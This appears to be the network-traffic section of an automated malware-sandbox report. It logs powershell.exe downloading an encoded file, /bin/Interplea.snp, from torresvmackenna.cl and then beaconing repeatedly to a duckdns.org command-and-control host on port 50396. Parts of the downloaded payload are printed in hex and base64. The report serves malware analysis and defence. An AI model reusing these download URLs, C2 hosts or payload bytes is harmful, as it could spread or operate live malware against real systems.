                                                                Oct 31, 2024 04:02:42.807655096 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.807708025 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.808377028 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.808428049 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.808487892 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.808551073 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.809377909 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.809453011 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.810146093 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.810214043 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.810329914 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.810391903 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.811069965 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.811140060 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.811220884 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.811278105 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.855823040 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.855915070 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.856214046 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.856278896 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.922286034 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.922362089 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.922661066 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.922718048 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.922991037 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.923042059 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.995143890 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.995229959 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.995502949 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.995558023 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.995990992 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.996046066 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.996165037 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.996218920 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:42.996356964 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:42.996407032 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.047189951 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.047255039 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.047415018 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.047463894 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.047749043 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.047817945 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.048063993 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.048116922 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.048418045 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.048474073 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.048681021 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.048739910 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.051949024 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.052032948 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.109781981 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.109879017 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.172435999 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.172503948 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.172702074 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.172755957 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.183958054 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184016943 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.184184074 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184240103 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.184338093 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184391975 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.184509993 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184562922 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.184669971 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.184725046 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.231446028 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.231519938 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.297027111 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.297099113 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.297425985 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.297481060 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.297787905 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.297852039 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.298049927 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.298104048 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.298293114 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.298351049 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.298489094 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.298571110 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.298748016 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.298809052 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.342852116 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.342930079 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.422283888 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.422358990 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.422982931 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.423038960 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.423048973 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.423078060 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.423176050 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.423185110 CET44349401200.6.118.162192.168.2.5
                                                                Oct 31, 2024 04:02:43.423194885 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:43.423399925 CET49401443192.168.2.5200.6.118.162
                                                                Oct 31, 2024 04:02:45.985011101 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:45.989792109 CET5039649428185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:45.989870071 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:45.993171930 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:45.997947931 CET5039649428185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:54.472302914 CET5039649428185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:54.472407103 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:54.472582102 CET4942850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:54.477354050 CET5039649428185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:55.515659094 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:55.522368908 CET5039649474185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:02:55.522445917 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:55.528388977 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:02:55.535419941 CET5039649474185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:04.014192104 CET5039649474185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:04.014343977 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:04.014456987 CET4947450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:04.019270897 CET5039649474185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:05.018584013 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:05.023588896 CET5039649522185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:05.023722887 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:05.027204037 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:05.032088995 CET5039649522185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:13.513582945 CET5039649522185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:13.513777018 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:13.513940096 CET4952250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:13.518750906 CET5039649522185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:14.518964052 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:14.523952961 CET5039649538185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:14.524049997 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:14.527569056 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:14.532392025 CET5039649538185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:23.019743919 CET5039649538185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:23.019864082 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:23.019942045 CET4953850396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:23.024830103 CET5039649538185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:24.034219027 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:24.039134979 CET5039649540185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:24.039279938 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:24.042543888 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:24.047396898 CET5039649540185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:32.520462990 CET5039649540185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:32.520591021 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:32.520698071 CET4954050396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:32.525542021 CET5039649540185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:33.534213066 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:33.539383888 CET5039649541185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:33.539524078 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:33.542753935 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:33.547636986 CET5039649541185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:42.021429062 CET5039649541185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:42.021521091 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:42.021579981 CET4954150396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:42.026468039 CET5039649541185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:43.034140110 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:43.039310932 CET5039649542185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:43.039424896 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:43.042253017 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:43.047085047 CET5039649542185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:51.521588087 CET5039649542185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:51.521790028 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:51.521888018 CET4954250396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:51.527384996 CET5039649542185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:53.142952919 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:53.147871971 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:03:53.150655985 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:53.164020061 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:03:53.169039965 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:02.145845890 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:02.145927906 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:02.145982027 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:02.146153927 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:02.146229982 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:02.146497011 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:02.146544933 CET4954350396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:02.151015043 CET5039649543185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:03.159282923 CET4954450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:03.164338112 CET5039649544185.236.203.101192.168.2.5
                                                                Oct 31, 2024 04:04:03.164431095 CET4954450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:03.168016911 CET4954450396192.168.2.5185.236.203.101
                                                                Oct 31, 2024 04:04:03.172887087 CET5039649544185.236.203.101192.168.2.5

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 31, 2024 04:02:00.538244963 CET4945553192.168.2.51.1.1.1
                                                                Oct 31, 2024 04:02:00.994132996 CET53494551.1.1.1192.168.2.5
                                                                Oct 31, 2024 04:02:17.883763075 CET53529941.1.1.1192.168.2.5
                                                                Oct 31, 2024 04:02:20.539830923 CET53525431.1.1.1192.168.2.5
                                                                Oct 31, 2024 04:02:44.541675091 CET5909553192.168.2.51.1.1.1
                                                                Oct 31, 2024 04:02:45.585501909 CET5909553192.168.2.51.1.1.1
                                                                Oct 31, 2024 04:02:45.979222059 CET53590951.1.1.1192.168.2.5
                                                                Oct 31, 2024 04:02:45.979245901 CET53590951.1.1.1192.168.2.5
                                                                Oct 31, 2024 04:03:52.533951044 CET6337753192.168.2.51.1.1.1
                                                                Oct 31, 2024 04:03:53.137340069 CET53633771.1.1.1192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 31, 2024 04:02:00.538244963 CET192.168.2.51.1.1.10x7d9dStandard query (0)torresvmackenna.clA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:02:44.541675091 CET192.168.2.51.1.1.10x7f37Standard query (0)fumecexpsales1international.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:02:45.585501909 CET192.168.2.51.1.1.10x7f37Standard query (0)fumecexpsales1international.duckdns.orgA (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:03:52.533951044 CET192.168.2.51.1.1.10x6c3bStandard query (0)fumecexpsales1international.duckdns.orgA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 31, 2024 04:01:55.447365046 CET1.1.1.1192.168.2.50x4f5fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:01:55.447365046 CET1.1.1.1192.168.2.50x4f5fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:02:00.994132996 CET1.1.1.1192.168.2.50x7d9dNo error (0)torresvmackenna.cl200.6.118.162A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:02:13.141521931 CET1.1.1.1192.168.2.50x5643No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:02:13.141521931 CET1.1.1.1192.168.2.50x5643No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:02:45.979222059 CET1.1.1.1192.168.2.50x7f37No error (0)fumecexpsales1international.duckdns.org185.236.203.101A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:02:45.979245901 CET1.1.1.1192.168.2.50x7f37No error (0)fumecexpsales1international.duckdns.org185.236.203.101A (IP address)IN (0x0001)false
                                                                Oct 31, 2024 04:03:53.137340069 CET1.1.1.1192.168.2.50x6c3bNo error (0)fumecexpsales1international.duckdns.org185.236.203.101A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • torresvmackenna.cl

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.549705200.6.118.162443576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-31 03:02:02 UTC179OUTGET /bin/Interplea.snp HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: torresvmackenna.cl
                                                                Connection: Keep-Alive
                                                                2024-10-31 03:02:02 UTC422INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 03:02:02 GMT
                                                                Server: Apache
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                X-Frame-Options: sameorigin
                                                                Last-Modified: Wed, 30 Oct 2024 22:04:36 GMT
                                                                Accept-Ranges: bytes
                                                                Content-Length: 440056
                                                                Referrer-Policy: no-referrer
                                                                X-XSS-Protection: 1; mode=block
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-Content-Type-Options: nosniff
                                                                Connection: close
                                                                2024-10-31 03:02:02 UTC7770INData Raw: 36 77 4c 4c 47 65 73 43 74 44 75 37 35 67 34 65 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 69 34 57 75 58 36 38 71 72 4e 78 41 5a 76 72 41 72 4d 32 67 66 47 57 55 32 34 7a 36 77 4a 67 74 4f 73 43 36 61 75 42 38 65 6a 76 78 49 44 72 41 6c 69 63 36 77 49 43 4f 75 73 43 66 55 35 78 41 5a 75 36 77 61 55 58 33 65 73 43 43 4f 7a 72 41 74 49 71 36 77 4b 6c 51 2b 73 43 2b 32 6f 78 79 75 73 43 33 66 62 72 41 72 50 31 69 52 51 4c 63 51 47 62 63 51 47 62 30 65 4c 72 41 69 6e 34 63 51 47 62 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6e 61 67 37 41 44 66 4d 74 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 50 72 41 67 56 34 63 51 47 62 67 63 4d 76 6f 70 34 43 63 51 47 62 63 51 47 62 75 6f 70 73 44 6c 6a 72 41 68 2b 50 36 77 4a
                                                                Data Ascii: 6wLLGesCtDu75g4eAHEBm3EBmwNcJARxAZvrAi4WuX68qrNxAZvrArM2gfGWU24z6wJgtOsC6auB8ejvxIDrAlic6wICOusCfU5xAZu6waUX3esCCOzrAtIq6wKlQ+sC+2oxyusC3fbrArP1iRQLcQGbcQGb0eLrAin4cQGbg8EEcQGbcQGbgfnag7ADfMtxAZtxAZuLRCQEcQGbcQGbicPrAgV4cQGbgcMvop4CcQGbcQGbuopsDljrAh+P6wJ
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 75 4c 43 64 4d 6e 52 4c 6a 69 61 4b 6f 62 2b 43 62 77 38 51 38 78 32 51 58 4e 47 49 38 4e 73 66 63 5a 7a 59 43 37 7a 76 6a 71 6d 37 73 59 4b 70 51 65 6a 6c 31 76 4a 33 56 46 53 2f 4e 38 52 4f 46 53 6a 6e 56 39 35 6a 38 78 51 77 4d 42 46 52 58 56 76 44 79 2f 71 30 64 75 50 43 72 4e 65 75 55 65 6d 44 36 37 4b 48 37 55 6e 6f 74 72 30 74 63 5a 6e 62 66 64 39 63 6a 73 64 68 42 65 31 6a 55 30 6c 4f 30 31 74 30 4f 31 79 67 4c 6e 6a 30 67 47 44 33 67 75 59 77 67 53 59 65 38 6b 5a 35 77 69 62 35 64 67 71 66 36 2b 50 58 51 4a 50 51 32 4c 69 6f 66 49 41 67 38 4d 75 44 7a 55 2f 41 62 4f 39 71 4f 36 65 79 56 38 4a 79 59 79 49 47 71 6b 41 33 4c 4b 6e 4a 6c 35 58 69 49 4c 69 6a 36 50 46 6a 32 48 4c 61 69 50 74 6b 59 39 67 66 39 61 6d 58 77 47 37 49 62 59 74 37 64 37 55
                                                                Data Ascii: uLCdMnRLjiaKob+Cbw8Q8x2QXNGI8NsfcZzYC7zvjqm7sYKpQejl1vJ3VFS/N8ROFSjnV95j8xQwMBFRXVvDy/q0duPCrNeuUemD67KH7Unotr0tcZnbfd9cjsdhBe1jU0lO01t0O1ygLnj0gGD3guYwgSYe8kZ5wib5dgqf6+PXQJPQ2LiofIAg8MuDzU/AbO9qO6eyV8JyYyIGqkA3LKnJl5XiILij6PFj2HLaiPtkY9gf9amXwG7IbYt7d7U
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 59 6d 42 7a 2f 4c 51 6f 61 31 63 6a 74 74 59 39 67 33 64 62 67 36 74 66 79 37 44 54 49 50 74 4d 6f 43 44 37 54 4b 41 67 2b 30 79 73 74 5a 32 77 43 4f 44 35 68 35 33 33 41 54 6d 35 4a 2b 50 42 4b 68 4e 2b 4d 39 51 49 71 30 58 53 36 51 71 50 5a 5a 41 48 50 37 67 51 2b 30 79 67 49 50 74 4d 6f 43 44 37 54 4b 78 61 4a 48 61 69 65 69 38 64 52 78 6a 34 33 4f 31 52 68 70 6b 45 50 69 44 4f 63 30 63 59 4e 75 56 62 41 67 4d 46 6f 79 4e 54 31 53 59 4d 79 70 67 38 68 43 43 74 32 75 50 66 30 61 53 43 68 56 77 72 58 50 78 50 4d 6a 41 48 45 65 78 64 63 6e 42 4b 6a 63 77 33 49 6a 44 45 59 6b 36 75 2b 58 70 66 69 4c 32 77 75 77 2f 42 38 54 4f 53 41 4a 6f 67 48 54 55 64 39 51 67 63 62 79 34 4c 54 46 41 68 6e 6c 79 67 49 50 74 4d 6f 43 44 37 54 4b 41 67 39 33 79 35 6d 47 49
                                                                Data Ascii: YmBz/LQoa1cjttY9g3dbg6tfy7DTIPtMoCD7TKAg+0ystZ2wCOD5h533ATm5J+PBKhN+M9QIq0XS6QqPZZAHP7gQ+0ygIPtMoCD7TKxaJHaiei8dRxj43O1RhpkEPiDOc0cYNuVbAgMFoyNT1SYMypg8hCCt2uPf0aSChVwrXPxPMjAHEexdcnBKjcw3IjDEYk6u+XpfiL2wuw/B8TOSAJogHTUd9Qgcby4LTFAhnlygIPtMoCD7TKAg93y5mGI
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 51 6e 6c 2f 31 4c 37 65 6c 4f 51 39 32 4f 51 30 4a 79 59 50 74 4c 39 64 4b 38 52 59 39 63 4b 45 50 68 44 6f 39 58 4f 2f 44 46 34 31 63 6e 4e 4d 6b 4b 54 37 61 43 41 33 51 61 5a 62 66 66 31 62 4a 55 72 4d 79 46 6b 55 55 73 67 4f 51 64 49 42 36 4f 6a 63 44 33 2f 61 31 4d 4c 49 30 34 44 31 49 71 39 74 5a 51 50 39 47 73 6c 4d 49 34 64 55 72 2f 34 4f 2f 7a 32 31 41 39 54 32 73 4e 74 4d 72 4f 71 33 69 4b 54 6b 45 2b 2f 73 66 4e 74 41 43 59 47 50 45 4e 4f 4f 42 50 35 58 51 52 50 61 70 68 79 45 31 71 39 50 58 77 39 4a 38 58 50 54 70 53 68 44 47 6a 41 41 2b 30 6d 4c 68 4e 70 32 4e 51 6a 6c 34 4d 4f 77 71 70 53 2f 44 51 45 6f 6a 42 6a 6b 5a 70 66 4f 35 43 6e 5a 36 47 55 38 4d 56 6b 6a 45 7a 66 67 68 73 44 39 63 46 45 30 54 50 77 62 47 46 73 73 4d 4b 47 38 6f 52 2b
                                                                Data Ascii: Qnl/1L7elOQ92OQ0JyYPtL9dK8RY9cKEPhDo9XO/DF41cnNMkKT7aCA3QaZbff1bJUrMyFkUUsgOQdIB6OjcD3/a1MLI04D1Iq9tZQP9GslMI4dUr/4O/z21A9T2sNtMrOq3iKTkE+/sfNtACYGPENOOBP5XQRPaphyE1q9PXw9J8XPTpShDGjAA+0mLhNp2NQjl4MOwqpS/DQEojBjkZpfO5CnZ6GU8MVkjEzfghsD9cFE0TPwbGFssMKG8oR+
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 76 77 32 58 48 62 65 34 35 47 70 45 79 4f 52 6b 76 41 48 74 4a 6e 6f 56 77 6f 51 2b 45 47 70 31 63 36 33 38 50 4f 55 65 6a 49 39 61 7a 43 2f 2b 73 67 75 67 37 64 44 2f 5a 6c 67 42 2b 43 72 46 78 70 4e 68 72 70 67 72 6e 53 54 39 46 55 4d 44 35 59 68 69 47 68 41 41 2b 30 6e 4c 77 61 68 2b 69 36 6a 6c 72 42 63 55 67 45 53 2f 51 4f 51 78 41 46 68 6f 70 42 73 6a 4c 78 70 42 70 32 4d 38 4d 6b 34 49 5a 68 2b 66 37 6c 54 70 68 77 39 46 6e 45 64 70 58 53 6f 2b 4e 45 6c 4c 69 2b 30 61 2b 43 6a 6b 62 74 4f 6c 71 52 53 2f 43 68 6c 56 49 67 6a 6c 37 79 57 71 63 7a 79 39 57 45 49 61 45 41 44 37 53 62 75 31 78 67 6b 55 43 4f 52 57 73 74 55 37 74 4c 38 2f 31 4f 7a 55 39 59 4b 45 50 6c 44 72 74 58 5a 44 5a 38 73 42 4c 70 6c 61 6d 73 6e 54 44 77 49 46 30 32 49 76 53 48 64
                                                                Data Ascii: vw2XHbe45GpEyORkvAHtJnoVwoQ+EGp1c638POUejI9azC/+sgug7dD/ZlgB+CrFxpNhrpgrnST9FUMD5YhiGhAA+0nLwah+i6jlrBcUgES/QOQxAFhopBsjLxpBp2M8Mk4IZh+f7lTphw9FnEdpXSo+NElLi+0a+CjkbtOlqRS/ChlVIgjl7yWqczy9WEIaEAD7Sbu1xgkUCORWstU7tL8/1OzU9YKEPlDrtXZDZ8sBLplamsnTDwIF02IvSHd
                                                                2024-10-31 03:02:02 UTC8000INData Raw: 4e 4b 6a 4d 78 4e 4d 73 65 70 69 54 73 32 6d 4a 49 6f 41 4c 58 64 6e 77 2b 30 79 67 49 50 74 4d 6f 43 44 37 54 4b 78 54 4c 38 50 32 79 45 4e 43 4e 49 50 58 54 64 39 58 6c 56 6c 50 75 6f 72 4b 4c 54 45 31 45 59 67 77 75 51 4e 69 2f 73 2b 5a 71 36 4b 66 59 4b 6b 7a 71 6f 45 55 58 2f 6d 66 43 61 69 4e 57 62 6e 6f 5a 56 79 77 4f 53 4d 42 6c 35 4c 53 7a 2f 6f 51 62 32 52 72 4a 56 4a 4c 6f 4b 53 33 6f 4a 75 4c 47 48 30 47 6d 56 62 2b 39 38 45 4c 58 62 6b 64 43 35 56 70 43 66 76 4b 4e 69 36 34 77 4a 57 7a 4e 35 6b 6f 4d 37 6b 4a 2b 56 71 73 48 46 42 4a 42 58 79 67 49 50 74 4d 6f 43 44 37 54 4b 41 67 39 68 6d 5a 76 65 4d 42 4c 39 52 73 62 59 76 65 61 67 5a 34 31 64 36 31 41 32 79 6f 4b 2b 4e 78 58 73 31 69 35 63 30 43 75 38 4d 54 4e 4c 42 69 76 62 36 4a 43 6c 65
